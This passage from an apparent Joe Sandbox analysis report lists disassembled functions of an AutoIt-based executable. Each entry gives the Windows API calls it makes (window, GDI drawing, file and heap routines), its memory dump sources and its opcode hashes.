                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2364484715-0
                                                                                                                              • Opcode ID: 9ebf4816618414220135fbe32a2326a74503265fce9eec98fe335a0cf1ce259f
                                                                                                                              • Instruction ID: e84a9f19d31792990721ce83ecc4fcbe0f9407295b7abd54cb43958ec71afeeb
                                                                                                                              • Opcode Fuzzy Hash: 9ebf4816618414220135fbe32a2326a74503265fce9eec98fe335a0cf1ce259f
                                                                                                                              • Instruction Fuzzy Hash: B8E09231210209DFCB11AF58EC49EAA37A6FB08351F018056FA055B6B1C771A961EF55
                                                                                                                              Function 001DF37C Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • NtdllDialogWndProc_W.NTDLL ref: 001DF3A1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DialogNtdllProc_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3239928679-0
                                                                                                                              • Opcode ID: 133ac36d8026a42f7f24c1eda202ab6a7da0899d3ee8c1fad444afc0a72a55e4
                                                                                                                              • Instruction ID: a3433a6422b8a678fecf65ee3b8afaab72c08c54d3272f2dacaf721b168a5e50
                                                                                                                              • Opcode Fuzzy Hash: 133ac36d8026a42f7f24c1eda202ab6a7da0899d3ee8c1fad444afc0a72a55e4
                                                                                                                              • Instruction Fuzzy Hash: 9DE0E27420420CEFDB01DF88E848E963BA5FB1A350F000054FD048B261C771A830EB61
                                                                                                                              Function 001DF3AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • NtdllDialogWndProc_W.NTDLL ref: 001DF3D0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DialogNtdllProc_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3239928679-0
                                                                                                                              • Opcode ID: 6afcc53c44a7bb3669096ce04480b8a7237d94af7dd196f28af565ed3eb621fc
                                                                                                                              • Instruction ID: 48d5ceb640a7196582b0deaa9a6e20ecc7c8821c3fddace6ea1b14ff3e9bf89b
                                                                                                                              • Opcode Fuzzy Hash: 6afcc53c44a7bb3669096ce04480b8a7237d94af7dd196f28af565ed3eb621fc
                                                                                                                              • Instruction Fuzzy Hash: 5AE0E27420020CEFDB01DF88E848E963BA5FB1A350F000054FD048B262C772A870EBA1
                                                                                                                              Function 0018B845 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                                • Part of subcall function 0018B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0018B85B), ref: 0018B926
                                                                                                                                • Part of subcall function 0018B86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,0018B85B,00000000,?,?,0018AF1E,?,?), ref: 0018B9BD
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,0018AF1E,?,?), ref: 0018B864
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2797419724-0
                                                                                                                              • Opcode ID: 9090546a2ae3822ead9be172c99ea96b564425aa2cdaf4dd210d0b88d25c443f
                                                                                                                              • Instruction ID: 283077664272175f480b25f3123b705c85b817763af4ee56a69e58cac9d89831
                                                                                                                              • Opcode Fuzzy Hash: 9090546a2ae3822ead9be172c99ea96b564425aa2cdaf4dd210d0b88d25c443f
                                                                                                                              • Instruction Fuzzy Hash: C3D012B114430C77EF103B61EC0BF5D3E1EAB11750F408431F705691E18B716561AA59
                                                                                                                              Function 00198E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00198E1F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3192549508-0
                                                                                                                              • Opcode ID: 4eda8dac582eb5f0f436a6cb6bb44d902984a6ac7808524b25838cab0e2cecb3
                                                                                                                              • Instruction ID: a818c556d7aad19f05a8e645a3635653e740742dd84879f27234974978e20868
                                                                                                                              • Opcode Fuzzy Hash: 4eda8dac582eb5f0f436a6cb6bb44d902984a6ac7808524b25838cab0e2cecb3
                                                                                                                              • Instruction Fuzzy Hash: E4A0127000450CA78B001B51FC044687F5DE7041507004010F50C00421873354508581
                                                                                                                              Function 0019A937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetProcessHeap.KERNEL32(00196AE9,002267D8,00000014), ref: 0019A937
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HeapProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 54951025-0
                                                                                                                              • Opcode ID: f2d70c7929174ac120a8d6dc8720508752b093e45de173940520503487a19c4f
                                                                                                                              • Instruction ID: 57e14c0aa69bc0a7e344ffa376abf222424999c8e22e3272c0c9db67aa0ee105
                                                                                                                              • Opcode Fuzzy Hash: f2d70c7929174ac120a8d6dc8720508752b093e45de173940520503487a19c4f
                                                                                                                              • Instruction Fuzzy Hash: C0B012F03031028BD7084B38BCA823E3AD55749101301407D7003C3D60DB30C450DF00
                                                                                                                              Function 00190EC4 Relevance: .3, Instructions: 345COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                              • Instruction ID: db7432651e602aee90e9d85f4ef826b45951f4671d71587afb76d67ec0867de0
                                                                                                                              • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                              • Instruction Fuzzy Hash: 4EC1A7722051934EDF2E8639C43443EFBA15EA27B131A076DE8B3CB5C4EF24DAA4D650
                                                                                                                              Function 001912F9 Relevance: .3, Instructions: 341COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                              • Instruction ID: 1abaaa4ea48e9f1c13893b92ce00085428680c6a162517d60fdc154676013157
                                                                                                                              • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                              • Instruction Fuzzy Hash: 5CC196722051934EDF2E8639C47443EFAA15AA27B131B076DD8B3CF5D4EF24CAA4D660
                                                                                                                              Function 00190A8F Relevance: .3, Instructions: 331COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                              • Instruction ID: b84bf6da1adbe6bfde72bb6a7c96be8b64378989b735e5620098345084f10c75
                                                                                                                              • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                              • Instruction Fuzzy Hash: 46C1B3722052934EDF2F8639C43443EFBA15AA67B531A076DD8B3CB4C4EF24DA64D660
                                                                                                                              Function 00190677 Relevance: .3, Instructions: 323COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                              • Instruction ID: 82e51fbed9e2f49243551a5e4d4752c3e136ec2795ab4539fc37f64a348d23a8
                                                                                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                              • Instruction Fuzzy Hash: 01C1D2722051934EDF2F863AC43443EBBA15EA67B531A076DD8B3CB4C1EF24DA64D660
                                                                                                                              Function 001CA750 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 001CA7A5
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 001CA7B7
                                                                                                                              • DestroyWindow.USER32 ref: 001CA7C5
                                                                                                                              • GetDesktopWindow.USER32 ref: 001CA7DF
                                                                                                                              • GetWindowRect.USER32(00000000), ref: 001CA7E6
                                                                                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 001CA927
                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 001CA937
                                                                                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001CA97F
                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 001CA98B
                                                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 001CA9C5
                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001CA9E7
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001CA9FA
                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001CAA05
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 001CAA0E
                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001CAA1D
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 001CAA26
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001CAA2D
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 001CAA38
                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 001CAA4A
                                                                                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,001FD9BC,00000000), ref: 001CAA60
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 001CAA70
                                                                                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 001CAA96
                                                                                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 001CAAB5
                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001CAAD7
                                                                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001CACC4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                              • API String ID: 2211948467-2373415609
                                                                                                                              • Opcode ID: 819ef504da44bf276d6f602d47c007c391674d40b8df8c3140080e3cd61ce2ab
                                                                                                                              • Instruction ID: 98308858b6f02410a665df6c8da822644ed690dd12008225b78615084f222712
                                                                                                                              • Opcode Fuzzy Hash: 819ef504da44bf276d6f602d47c007c391674d40b8df8c3140080e3cd61ce2ab
                                                                                                                              • Instruction Fuzzy Hash: F6026C71900219AFDB15DFA4DD89EBE7BB9EF48314F108159F905AB2A0DB30ED41CBA1
                                                                                                                              Function 001DD095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 001DD0EB
                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 001DD11C
                                                                                                                              • GetSysColor.USER32(0000000F), ref: 001DD128
                                                                                                                              • SetBkColor.GDI32(?,000000FF), ref: 001DD142
                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 001DD151
                                                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 001DD17C
                                                                                                                              • GetSysColor.USER32(00000010), ref: 001DD184
                                                                                                                              • CreateSolidBrush.GDI32(00000000), ref: 001DD18B
                                                                                                                              • FrameRect.USER32(?,?,00000000), ref: 001DD19A
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 001DD1A1
                                                                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 001DD1EC
                                                                                                                              • FillRect.USER32(?,?,00000000), ref: 001DD21E
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 001DD249
                                                                                                                                • Part of subcall function 001DD385: GetSysColor.USER32(00000012), ref: 001DD3BE
                                                                                                                                • Part of subcall function 001DD385: SetTextColor.GDI32(?,?), ref: 001DD3C2
                                                                                                                                • Part of subcall function 001DD385: GetSysColorBrush.USER32(0000000F), ref: 001DD3D8
                                                                                                                                • Part of subcall function 001DD385: GetSysColor.USER32(0000000F), ref: 001DD3E3
                                                                                                                                • Part of subcall function 001DD385: GetSysColor.USER32(00000011), ref: 001DD400
                                                                                                                                • Part of subcall function 001DD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 001DD40E
                                                                                                                                • Part of subcall function 001DD385: SelectObject.GDI32(?,00000000), ref: 001DD41F
                                                                                                                                • Part of subcall function 001DD385: SetBkColor.GDI32(?,00000000), ref: 001DD428
                                                                                                                                • Part of subcall function 001DD385: SelectObject.GDI32(?,?), ref: 001DD435
                                                                                                                                • Part of subcall function 001DD385: InflateRect.USER32(?,000000FF,000000FF), ref: 001DD454
                                                                                                                                • Part of subcall function 001DD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001DD46B
                                                                                                                                • Part of subcall function 001DD385: GetWindowLongW.USER32(00000000,000000F0), ref: 001DD480
                                                                                                                                • Part of subcall function 001DD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001DD4A8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3521893082-0
                                                                                                                              • Opcode ID: 3d6145ab79bf2327805dd2fd1e4129d6e70993a8598204e9988b11ac4556d4a4
                                                                                                                              • Instruction ID: a7c5756b9ab396a298b4c52538dec1ef459fa57999c96f0a560965dc6f60f8b3
                                                                                                                              • Opcode Fuzzy Hash: 3d6145ab79bf2327805dd2fd1e4129d6e70993a8598204e9988b11ac4556d4a4
                                                                                                                              • Instruction Fuzzy Hash: 05915B72408301AFDB109F64EC48E7BBBBAFB89325F100A19F966965A0D771D984CB52
                                                                                                                              Function 001CA3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • DestroyWindow.USER32(00000000), ref: 001CA42A
                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001CA4E9
                                                                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 001CA527
                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 001CA539
                                                                                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 001CA57F
                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 001CA58B
                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 001CA5CF
                                                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001CA5DE
                                                                                                                              • GetStockObject.GDI32(00000011), ref: 001CA5EE
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 001CA5F2
